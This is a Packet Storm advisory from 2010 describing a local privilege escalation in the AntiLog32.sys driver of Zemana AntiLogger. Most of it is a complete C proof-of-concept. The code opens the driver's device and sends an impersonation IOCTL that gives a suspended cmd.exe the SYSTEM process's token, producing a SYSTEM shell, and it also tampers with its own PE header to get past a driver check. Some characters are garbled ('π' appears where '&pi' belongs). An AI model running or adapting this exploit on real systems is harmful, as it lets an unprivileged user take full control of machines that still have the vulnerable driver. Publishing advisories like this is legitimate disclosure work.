Zemana AntiLogger with AntiLog32.sys versions 1.5.2.755 and below suffer from a local privilege escalation vulnerability.
c4b5374aef4fafad83d8cf34f59211029acaf54deb05c6b2269c93d7ea737d0aZemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability
VULNERABLE PRODUCTS
Zemana AntiLogger <=1.9.2.2.206
DETAILS:
AntiLog32.sys create a device called \Device\AntiLog32 , and handles DeviceIoControl request IoControlCode = 0x8000201C , which can elevate the privilege of a process to another process
EXPLOIT CODE:
#include "stdafx.h"
#include "windows.h"
#include "winioctl.h"
#define IOCTL_IMPERSONATE_PROCESS CTL_CODE(0x8000 , 0x807 , METHOD_BUFFERED , FILE_ANY_ACCESS)
typedef struct _IMPERSONATE_PROCESS{
HANDLE ImpersonateProcess ;
HANDLE SystemProcess ;
}IMPERSONATE_PROCESS , *PIMPERSONATE_PROCESS;
int main(int argc, char* argv[])
{
printf("Zemana AntiLogger <=1.9.2.2.206 AntiLog32.sys <= 1.5.2.755\n"
"Local Privilege Escalation Vulnerability Proof-of-Concept\n"
"2010-7-28\n"
"By MJ0011 th_decoder@126.com\n\nPress Enter\n");
getchar();
//bypass some useless create check
PIMAGE_DOS_HEADER pdoshdr = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
PIMAGE_NT_HEADERS pnthdr = (PIMAGE_NT_HEADERS)((ULONG)pdoshdr + pdoshdr->e_lfanew);
PVOID waddr = &pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress ;
ULONG oldp ;
VirtualProtect(waddr , sizeof(ULONG) , PAGE_READWRITE , &oldp);
pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0x1 ;
VirtualProtect(waddr , sizeof(ULONG) , oldp , &oldp);
HANDLE hdev = CreateFile("\\\\.\\AntiLog32" ,
FILE_READ_ATTRIBUTES ,
FILE_SHARE_READ ,
0,
OPEN_EXISTING ,
0,0);
if (hdev == INVALID_HANDLE_VALUE)
{
printf("cannot open device %u\n" , GetLastError());
getchar();
return 0;
}
STARTUPINFOA sia ;
memset(&sia , 0 , sizeof(sia));
sia.cb = sizeof(sia);
PROCESS_INFORMATION pi ;
memset(π , 0 , sizeof(pi));
if (!CreateProcess("c:\\windows\\system32\\cmd.exe" ,
NULL ,
NULL,
NULL,
FALSE ,
CREATE_SUSPENDED,
NULL,
NULL,
&sia ,
π))
{
printf("cannot run cmd.exe....%u\n", GetLastError());
getchar();
return 0 ;
}
IMPERSONATE_PROCESS ip ;
ip.ImpersonateProcess = (HANDLE)pi.dwProcessId ;
ip.SystemProcess = (HANDLE)4 ; //// WinXP and later
ULONG btr ;
if (!DeviceIoControl(hdev , IOCTL_IMPERSONATE_PROCESS , &ip , sizeof(ip) , NULL , 0 , &btr, 0))
{
printf("cannot impersonate process %u\n" , GetLastError());
getchar();
return 0 ;
}
ResumeThread(pi.hThread);
printf("OK\n");
return 0;
}
================================
th_decoder
2010-07-28
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed